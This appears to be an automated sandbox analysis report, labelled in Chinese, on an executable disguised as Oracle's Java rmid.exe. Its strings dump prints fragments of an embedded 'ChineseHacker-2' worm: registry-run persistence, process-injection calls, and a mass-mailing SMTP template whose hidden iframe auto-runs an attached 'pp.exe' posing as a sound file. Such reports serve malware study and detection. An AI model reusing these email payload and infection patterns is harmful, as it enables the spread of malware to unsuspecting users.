0.6
低危
DACN
0.12
FACILE
1.00
IMCLNet
0.59
MFGraph
0.00
反病毒引擎
未检测
暂无反病毒引擎检测结果
静态指标
此可执行文件具有 PDB 路径
(1 个事件)
| pdb_path | c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u221\13320\build\windows-i586\jdk\objs\rmid_objs\rmid.pdb |
动态指标
该二进制文件可能包含加密或压缩数据,表明使用了打包工具
(2 个事件)
| section | {'name': '.reloc', 'virtual_address': '0x00005000', 'virtual_size': '0x000033ec', 'size_of_data': '0x000033ec', 'entropy': 7.024191161701106} | entropy | 7.024191161701106 | description | 发现高熵的节 | |||||||||
| entropy | 0.6337974442113294 | description | 此PE文件的整体熵值较高 | |||||||||||
网络通信
与未执行 DNS 查询的主机进行通信
(1 个事件)
| host | 114.114.114.114 | |||
二进制图像
288x288
224x224
192x192
160x160
128x128
96x96
64x64
32x32
运行截图
暂无运行截图
该样本运行过程中未生成截图
PE Compile Time
2019-07-05 10:41:03
PDB Path
c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u221\13320\build\windows-i586\jdk\objs\rmid_objs\rmid.pdb
PE Imphash
d3310ce6cbcacb3a9f0809bc33e38abe
Sections
| Name | Virtual Address | Virtual Size | Size of Raw Data | Entropy |
|---|---|---|---|---|
| .text | 0x00001000 | 0x000008da | 0x00000a00 | 5.673842681290998 |
| .rdata | 0x00002000 | 0x000007aa | 0x00000800 | 4.996484920603437 |
| .data | 0x00003000 | 0x000003ac | 0x00000200 | 0.7697157509647301 |
| .rsrc | 0x00004000 | 0x00000980 | 0x00000a00 | 5.131170655598301 |
| .reloc | 0x00005000 | 0x000033ec | 0x000033ec | 7.024191161701106 |
Resources
| Name | Offset | Size | Language | Sub-language | File type |
|---|---|---|---|---|---|
| RT_VERSION | 0x000040a0 | 0x00000334 | LANG_NEUTRAL | SUBLANG_NEUTRAL | None |
| RT_MANIFEST | 0x000043d4 | 0x000005aa | LANG_ENGLISH | SUBLANG_ENGLISH_US | None |
Imports
Library jli.dll:
• 0x4020b8 JLI_CmdToArgs
• 0x4020bc JLI_GetStdArgc
• 0x4020c0 JLI_MemAlloc
• 0x4020c4 JLI_GetStdArgs
• 0x4020c8 JLI_Launch
Library MSVCR100.dll:
• 0x402048 _initterm_e
• 0x40204c _configthreadlocale
• 0x402050 __setusermatherr
• 0x402054 _commode
• 0x402058 _fmode
• 0x40205c _initterm
• 0x402060 ?terminate@@YAXXZ
• 0x402064 _unlock
• 0x402068 __dllonexit
• 0x40206c _lock
• 0x402070 _onexit
• 0x402074 _except_handler4_common
• 0x402078 _invoke_watson
• 0x40207c _controlfp_s
• 0x402080 _crt_debugger_hook
• 0x402084 __initenv
• 0x402088 exit
• 0x40208c _XcptFilter
• 0x402090 _exit
• 0x402094 _cexit
• 0x402098 __getmainargs
• 0x40209c _amsg_exit
• 0x4020a0 getenv
• 0x4020a4 printf
• 0x4020a8 __argc
• 0x4020ac __argv
• 0x4020b0 __set_app_type
Library KERNEL32.dll:
• 0x402000 IsDebuggerPresent
• 0x402004 UnhandledExceptionFilter
• 0x402008 GetCurrentProcess
• 0x40200c TerminateProcess
• 0x402010 GetSystemTimeAsFileTime
• 0x402014 GetCurrentThreadId
• 0x402018 GetTickCount
• 0x40201c QueryPerformanceCounter
• 0x402020 DecodePointer
• 0x402024 SetUnhandledExceptionFilter
• 0x402028 EncodePointer
• 0x40202c HeapSetInformation
• 0x402030 InterlockedCompareExchange
• 0x402034 Sleep
• 0x402038 InterlockedExchange
• 0x40203c GetCommandLineA
• 0x402040 GetCurrentProcessId
L!This program cannot be run in DOS mode.
R%^<v^<v^<vWv\<vExv_<vExv\<vExv[<v^=vo<vExvJ<vExv_<vExv_<vRich^<v
`.rdata
@.data
@.reloc
SVWh!@
3Yt8= @
A;| 0@
8_^[% @
8csmu*x
EEPEPu
;r_^% @
B(;r3_^[]
SVW80@
1E3PEd
Y_^[]%\ @
+SVW80@
1E3PeuEEEEd
Y__^[]Q
E3E3;u
^_[%` @
/classes
/lib/tools.jar
sun.rmi.server.Activation
-J-ms8m
JAR file
Main class
Unknown
1.8.0_221-b11
wwwd_args[%d] = %s
Windows original main args:
_JAVA_LAUNCHER_DEBUG
c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u221\13320\build\windows-i586\jdk\objs\rmid_objs\rmid.pdb
JLI_Launch
JLI_GetStdArgs
JLI_MemAlloc
JLI_GetStdArgc
JLI_CmdToArgs
jli.dll
__argv
__argc
printf
getenv
MSVCR100.dll
_amsg_exit
__getmainargs
_cexit
_XcptFilter
__initenv
_initterm
_initterm_e
_configthreadlocale
__setusermatherr
_commode
_fmode
__set_app_type
?terminate@@YAXXZ
_unlock
__dllonexit
_onexit
_except_handler4_common
_invoke_watson
_controlfp_s
_crt_debugger_hook
GetCommandLineA
InterlockedExchange
InterlockedCompareExchange
HeapSetInformation
EncodePointer
SetUnhandledExceptionFilter
DecodePointer
QueryPerformanceCounter
GetTickCount
GetCurrentThreadId
GetCurrentProcessId
GetSystemTimeAsFileTime
TerminateProcess
GetCurrentProcess
UnhandledExceptionFilter
IsDebuggerPresent
KERNEL32.dll
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3">
<assemblyIdentity version="8.0.221.11" processorArchitecture="X86" name="Oracle Corporation, Java(tm) 2 Standard Edition" type="win32"></assemblyIdentity>
<description>Java(TM) SE rmid process</description>
<dependency>
<dependentAssembly>
<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity>
</dependentAssembly>
</dependency>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
</requestedPrivileges>
</security>
</trustInfo>
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
<application>
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS>
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS>
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"></supportedOS>
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"></supportedOS>
<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"></supportedOS>
</application>
</compatibility>
</assembly>PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING
0#0/0:0A0O00000000000000
1 1(1<1I1V1j1s11111111111
2 23282>2F2L2R2_2e2n222222222222
3!3&3+30373=3O3W3]3i3t3333333
4#494Q4[444444555555>6D6Q6n666
7%727>7F7N7Z777777777777777777
8"8)81898A8M8V8[8a8k8t8
8888888888
00011$2(222
OFkDvk=
~|NYKw
Western Cape1
Durbanville1
Thawte1
Thawte Certification1 0
Thawte Timestamping CA0
121221000000Z
201230235959Z0^1
Symantec Corporation100.
'Symantec Time Stamping Services CA - G20
%y"W*o
%CE{t"
MD$k_E;DC
&Mq 1Qa
xE/W?=
Qlie)`
h]jxdE`F~T
_n\t}?L.02
http://ocsp.thawte.com0
8060420.http://crl.thawte.com/ThawteTimestampingCA.crl0
TimeStamp-2048-10
DnmX|0i#s
y@b%n7j!
Symantec Corporation100.
'Symantec Time Stamping Services CA - G20
121018000000Z
201229235959Z0b1
Symantec Corporation1402
+Symantec Time Stamping Services Signer - G40
[LvCK"+Ch@O8
2[^Z(P
Gf=Gpr_
L-wD h
[2V3cI:3
http://ts-ocsp.ws.symantec.com07
+http://ts-aia.ws.symantec.com/tss-ca-g2.cer0<
50301/-+http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
TimeStamp-2048-20
_n\t}?L.0
Lb07x'
2m,&c3Idm
7 Cxx(
]=Qy3+.{
[0W,I?
>"hcSit
Symantec Corporation1 0
Symantec Trust Network100.
'Symantec Class 3 SHA256 Code Signing CA0
180226000000Z
200227235959Z01
California1
Redwood City1
Oracle America, Inc.1
Software Engineering1
Oracle America, Inc.0
0ztd;H
=:GQHA
3&>g$u
moo.h|*}6Z Ne
https://d.symcb.com/cps0%
https://d.symcb.com/rpa0
;Sy3}.+
http://sv.symcb.com/sv.crl0W
http://sv.symcd.com0&
http://sv.symcb.com/sv.crt0
OzW<-{{Z2u;
2PE3u(
lVqE__e>;3
y~gH!~#n
\.wx&S!bV\
=xvI`a}
VeriSign, Inc.1 0
VeriSign Trust Network1:08
1(c) 2006 VeriSign, Inc. - For authorized use only1E0C
<VeriSign Class 3 Public Primary Certification Authority - G50
131210000000Z
231209235959Z0
Symantec Corporation1 0
Symantec Trust Network100.
'Symantec Class 3 SHA256 Code Signing CA0
qGXM#bjZ
wh6/!P
?A<J9S!
${1-=n
S[5Wba
Mb{h1e
+ojr\`
http://s2.symcb.com0
http://www.symauth.com/cps0(
http://www.symauth.com/rpa00
)0'0%#! http://s1.symcb.com/pca3-g5.crl0
SymantecPKI-1-5670
;Sy3}.+
U9qeZ0DZapo!
5/3XVM;y
V?.)|=
?MLrgw'
" wCL?d
Symantec Corporation1 0
Symantec Trust Network100.
'Symantec Class 3 SHA256 Code Signing CA
1V0TRP
f2C(\s9
#?7bs*5p
cQ5EFd
"k;CS{
2bzr3,
Symantec Corporation100.
'Symantec Time Stamping Services CA - G2
190705033700Z0#
NZv*xXNP
$NpD2c
GetProcAddress
USER32.DLL
ADVAPI32.DLL
MPR.DLL
WSOCK32.DLL
ChineseHacker-2
PVdt\VJ
Net Send * My god! Some one killed ChineseHacker-2 Monitor
WV(PT.
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Runonce
PTjNRUSVTXNu,
RQSVTVLTj
GetSystemTime
GetComputerNameA
WideCharToMultiByte
TerminateThread
CreateThread
_lcreat
GetSystemDirectoryA
VirtualAllocEx
WaitForSingleObject
CloseHandle
CreateKernelThread
CreateRemoteThread
WriteProcessMemory
OpenProcess
GetCurrentProcessId
RegisterServiceProcess
_lclose
_llseek
_lwrite
_lread
_lopen
SetFileTime
SetFileAttributesA
FindClose
FindNextFileA
FindFirstFileA
SetCurrentDirectoryA
GetDriveTypeA
WinExec
GetCommandLineA
GetLastError
CreateMutexA
LoadLibraryA
wsprintfA
SendMessageA
GetWindow
MessageBoxA
FindWindowA
GetWindowThreadProcessId
RegNotifyChangeKeyValue
RegQueryValueExA
RegSetValueExA
RegOpenKeyA
WNetCloseEnum
WNetEnumResourceA
WNetOpenEnumA
closesocket
socket
connect
gethostbyname
WSACleanup
WSAStartup
\runouce.exe
=winntv=windtou
t1TSV
<.tRT@
WV@SV@
_,S`=.wabt!=.adct%=r.dbt
=.doct
=.xlst
TSV8SV@
_,S=.exetS=.scrtL=.htmt
=htmlt
RQPSV,SV@_,7SV(
RQPSV,SV@_,7SV(
readme.eml
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html>
XjxPWV8SV@a
V4Xf=`
PSV4YZ
;w@tE.t<0r
$<@t<.tTH
PSV<Od
w6QjDWSV4
btamail.net.cn
HELO btamail.net.cn
MAIL FROM: imissyou@btamail.net.cn
RCPT TO: %s
FROM: %s@yahoo.com
TO: %s
SUBJECT: %s is comming!
MIME-Version: 1.0
Content-type: multipart/mixed; boundary="#BOUNDARY#"
--#BOUNDARY#
Content-Type: text/html
Content-Transfer-Encoding: quoted-printable
<html><HEAD></HEAD><body bgColor=3D#ffffff><iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe></body></html>
--#BOUNDARY#
MIME-Version: 1.0
Content-Type: audio/x-wav; name="pp.exe"
Content-Transfer-Encoding: base64
Content-id: THE-CID
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
L!This program must be run under Win32
.idata
.reloc
KERNEL32.dll
PSV8XY
Runonce
HuXTWj
V�S�_�V�E�R�S�I�O�N�_�I�N�F�O�
S�t�r�i�n�g�F�i�l�e�I�n�f�o�
0�0�0�0�0�4�b�0�
C�o�m�p�a�n�y�N�a�m�e�
O�r�a�c�l�e� �C�o�r�p�o�r�a�t�i�o�n�
F�i�l�e�D�e�s�c�r�i�p�t�i�o�n�
J�a�v�a�(�T�M�)� �P�l�a�t�f�o�r�m� �S�E� �b�i�n�a�r�y�
F�i�l�e�V�e�r�s�i�o�n�
8�.�0�.�2�2�1�0�.�1�1�
F�u�l�l� �V�e�r�s�i�o�n�
1�.�8�.�0�_�2�2�1�-�b�1�1�
I�n�t�e�r�n�a�l�N�a�m�e�
L�e�g�a�l�C�o�p�y�r�i�g�h�t�
C�o�p�y�r�i�g�h�t� �
O�r�i�g�i�n�a�l�F�i�l�e�n�a�m�e�
r�m�i�d�.�e�x�e�
P�r�o�d�u�c�t�N�a�m�e�
J�a�v�a�(�T�M�)� �P�l�a�t�f�o�r�m� �S�E� �8�
P�r�o�d�u�c�t�V�e�r�s�i�o�n�
8�.�0�.�2�2�1�0�.�1�1�
V�a�r�F�i�l�e�I�n�f�o�
T�r�a�n�s�l�a�t�i�o�n�
P�J�a�v�a� �S�E� �R�u�n�t�i�m�e� �E�n�v�i�r�o�n�m�e�n�t� �8� �U�p�d�a�t�e� �2�2�
Process Tree
Hosts
| IP |
|---|
| 114.114.114.114 |
DNS
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| dns.msftncsi.com | A 131.107.255.255 | 131.107.255.255 |
| dns.msftncsi.com | AAAA fd3e:4f5a:5b81::1 | 131.107.255.255 |
TCP
No TCP connections recorded.
UDP
| Source | Source Port | Destination | Destination Port |
|---|---|---|---|
| 192.168.56.101 | 53179 | 224.0.0.252 | 5355 |
| 192.168.56.101 | 49642 | 224.0.0.252 | 5355 |
| 192.168.56.101 | 137 | 192.168.56.255 | 137 |
| 192.168.56.101 | 61714 | 114.114.114.114 | 53 |
| 192.168.56.101 | 56933 | 114.114.114.114 | 53 |
| 192.168.56.101 | 138 | 192.168.56.255 | 138 |
HTTP & HTTPS Requests
No HTTP requests performed.
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts
Sorry! No dropped files.
Sorry! No dropped buffers.